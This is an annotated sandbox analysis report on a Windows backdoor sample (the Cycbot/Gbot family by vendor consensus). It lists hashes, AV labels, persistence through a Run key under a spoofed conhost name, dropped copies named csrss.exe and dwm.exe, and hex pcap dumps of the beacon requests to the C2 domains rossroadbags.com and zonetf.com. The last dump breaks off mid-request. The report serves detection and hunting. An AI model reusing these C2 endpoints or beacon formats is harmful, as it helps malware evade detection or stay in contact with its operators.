Analysis Date: 2015-01-17 13:28:35
MD5: 2e3e8aae0c4d4a435040e8d743a033f2
SHA1: 61d450c1ee678794030d2217a1d257d412d2c2a8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 65dbc2a74e105a129f2e501d8da3028c sha1: 84a9809b40838da056c44c82eeca2353a464cc47 size: 150528
Section .rdata: md5: 7f026155ac81300f01e5f231c51191e0 sha1: 4a378ee3379d2999fe4b4e913775528ab7ad718a size: 1024
Section .data: md5: a79e048f24cc2bc407efa20aed0e0461 sha1: bae22dfef6975af5ea8cebe25ce192b57c2ce5a8 size: 19968
Section .crt: md5: a16803c07003f766135fef0065bbef43 sha1: bc57c96bbb88bee4fbed850cda1465705be19f88 size: 512
(A 1 KiB .rdata next to a ~147 KiB .text leaves room for only a handful of static imports; together with the LoadLibraryA/GetProcAddress strings at the end of this report this is consistent with a packed sample that resolves its real API set at runtime — to be confirmed by unpacking.)
Timestamp: 2005-09-10 00:28:51 (PE header compile time — nearly ten years before the analysis date, and several engines below label the sample as crypted/packed, so treat this value as unreliable)
Version: PrivateBuild: 1051
PEhash: d05012c2f2a237b108e2f2560f7df483c3113e61
IMPhash: 47d147a0f1cbb5bd87c6ee399ff75a38 (with the PEhash, the useful pivot for clustering related samples of the same packer/family)
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Agent.psa.41
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/Gbot.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Agent-59855
AV Dr. Web: BackDoor.Gbot.15
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.KAP
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Agent.DQLH
AV Grisoft (avg): Cryptic.CBZ
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Hoax.Win32.ArchSMS.gen
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: Trojan.Win32.Generic.12787FE1
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): Trojan.Diple
(Vendor consensus is the Cycbot/Gbot backdoor family — CA, CAT, Dr. Web, Ikarus, Microsoft, Symantec and Trend Micro agree, with Authentium/F-Prot's "Goolbot" being the same family under another name. ESET's Kryptik and AVG's Cryptic are packer/crypter labels rather than family names; Kaspersky's Hoax.ArchSMS and the FakeAV verdicts are outliers. Only 360 Safe reported clean.)

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
(turns on the WinINet proxy setting; no ProxyServer value is recorded here, but together with the 127.0.0.1 DNS lookup below this is consistent with browser traffic being routed through a local proxy — confirm by checking ProxyServer on an infected host)
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
(persistence through the machine-wide Run key — writable in this run because the sandbox user is Administrator, as the paths show. The value name and file name imitate the Windows conhost.exe, but the target sits under a user-writable %APPDATA%\Microsoft path; a Run entry whose value name is a system binary and whose target is outside %SystemRoot% is a strong hunting indicator)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
(The index.dat entries and \Device\Afd\Endpoint are side effects of the WinINet/Winsock calls used for the HTTP traffic below, not payloads. The dropped/launched copies are named after core Windows processes — conhost.exe, dwm.exe, csrss.exe — but live in %APPDATA% and %TEMP%; the genuine binaries only ever run from %SystemRoot%\System32, so any process with one of these image names outside System32 is a high-confidence detection. The purpose of 75DE.FFC is not shown in this report.)
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
(WininetConnectionMutex and the three path-shaped names look like WinINet's own cache/connection mutexes created as a side effect of the HTTP activity, so they are poor indicators. The five GUID-style mutexes are the candidates for host-based detection, but whether they are fixed across samples or derived per host cannot be determined from a single run.)
Winsock DNS: onloneservermonitoring.com
Winsock DNS: offlineservermonitoring.com
Winsock DNS: 127.0.0.1
Winsock DNS: rossroadbags.com
(The lookup of 127.0.0.1 alongside ProxyEnable=1 above suggests a proxy bound to loopback; no listening port is recorded in this report, so confirm with a netstat/listener capture.)

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: rossroadbags.com
Type: A
50.56.218.189
DNS: zonetf.com
Type: A
141.8.225.80
DNS: onloneservermonitoring.com
Type: A
(no address returned — unresolved at analysis time)
DNS: offlineservermonitoring.com
Type: A
(no address returned — unresolved at analysis time)
HTTP GET: http://rossroadbags.com/images/p_thumb/3521.jpg?tq=gP4aKydlxIAUQjLd11JEgWF2a0B6hr%2BkFV3LSkv%2BvuszGHEAlVXOlgdKJpido9OfPJqHhwgnAbCWxROt6Hx2P5Jhu5v5IH1XhjsV5fqGs4KkXmzK8yekoISjTNy1Hy60EKGdkZUF7tKHBx7Bz%2FmA22%2F4%2BMy5ummeAm%2BIoFmK0hMm3Ys5mVRyCqZI3f4tFK%2F9dgf8OLo%2Fg9XpADQZedoiUNm8IuL5THP6jguidUjLHo04mbuLj%2Fy40Hw64gzFiFe7ZN1ifIfWxLp7vIP29i3dp%2F%2FrOe454rypIQ7laPiImNBakx6C0uA38dZ4TPj9ehVt4RIRYP2JtYB9N%2F3XPMUw1KIHPc75cQPtx3lQfziBQRzNyZOdXk7ucuUCJsJV5gmT7qZI3hvYViewaoI8Vd%2Bb5wDQLoT6%2F4kGdTsjqBj2FzKPPUscOgkdU5fYb4jO0BRth
User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
(Two distinct request profiles. The GET to rossroadbags.com asks for an image path but carries a ~500-byte URL-encoded, base64-looking `tq` blob and the non-browser User-Agent `iamx/3.11` over HTTP/1.0 — that UA string is a cheap, high-precision network signature. The POSTs to zonetf.com use a generic IE6 User-Agent and HTTP/1.1, but the pcap shows `Content-Length: 0`, so all data travels in the `tq` query string rather than the body; the five POSTs share a fixed prefix up to `...OpLjRqAO` and differ only in the tail, which suggests a constant encoded header (e.g. a bot/host identifier) followed by a per-request field — to be confirmed by decoding. Whether `tq` is merely encoded or also encrypted cannot be determined from this report.)
Flows TCP: 192.168.1.1:1031 ➝ 50.56.218.189:80 (rossroadbags.com — the GET)
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80 (zonetf.com — one POST per connection, each closed with `Connection: close`)
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
(Reading note: in the POST captures below, the bytes that follow the request's terminating blank line — `rOe454rypIQ7...` and `rypIQ7laPi...` through `User-Agent: iamx/3.11` — are byte-for-byte the tail of the earlier GET request to rossroadbags.com. Since the POSTs declare `Content-Length: 0`, these are almost certainly stale buffer contents from the capture/display tool rather than a POST body; do not treat them as exfiltrated data. The `<address>Microsoft-IIS/7.0</address> ... </html>` fragment is the end of a server HTML response, most likely an IIS-generated error page, but the status line is not shown so the server's actual response to the beacon cannot be confirmed here.)
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353231 2e6a7067 3f74713d   umb/3521.jpg?tq=
0x00000020 (00032)   67503461 4b79646c 78494155 516a4c64   gP4aKydlxIAUQjLd
0x00000030 (00048)   31314a45 67574632 61304236 68722532   11JEgWF2a0B6hr%2
0x00000040 (00064)   426b4656 334c536b 76253242 7675737a   BkFV3LSkv%2Bvusz
0x00000050 (00080)   47484541 6c56584f 6c67644b 4a706964   GHEAlVXOlgdKJpid
0x00000060 (00096)   6f394f66 504a7148 6877676e 41624357   o9OfPJqHhwgnAbCW
0x00000070 (00112)   78524f74 36487832 50354a68 75357635   xROt6Hx2P5Jhu5v5
0x00000080 (00128)   49483158 686a7356 35667147 73344b6b   IH1XhjsV5fqGs4Kk
0x00000090 (00144)   586d7a4b 3879656b 6f49536a 544e7931   XmzK8yekoISjTNy1
0x000000a0 (00160)   48793630 454b4764 6b5a5546 37744b48   Hy60EKGdkZUF7tKH
0x000000b0 (00176)   42783742 7a253246 6d413232 25324634   Bx7Bz%2FmA22%2F4
0x000000c0 (00192)   2532424d 7935756d 6d65416d 25324249   %2BMy5ummeAm%2BI
0x000000d0 (00208)   6f466d4b 30684d6d 33597335 6d565279   oFmK0hMm3Ys5mVRy
0x000000e0 (00224)   43715a49 33663474 464b2532 46396467   CqZI3f4tFK%2F9dg
0x000000f0 (00240)   66384f4c 6f253246 67395870 4144515a   f8OLo%2Fg9XpADQZ
0x00000100 (00256)   65646f69 554e6d38 49754c35 54485036   edoiUNm8IuL5THP6
0x00000110 (00272)   6a677569 64556a4c 486f3034 6d62754c   jguidUjLHo04mbuL
0x00000120 (00288)   6a253246 79343048 77363467 7a466946   j%2Fy40Hw64gzFiF
0x00000130 (00304)   65375a4e 31696649 6657784c 70377649   e7ZN1ifIfWxLp7vI
0x00000140 (00320)   50323969 33647025 32462532 46724f65   P29i3dp%2F%2FrOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a724f65   on: close....rOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a72 79704951 376c6150 69496d4e   ...rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a72 79704951 376c6150 69496d4e   ...rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
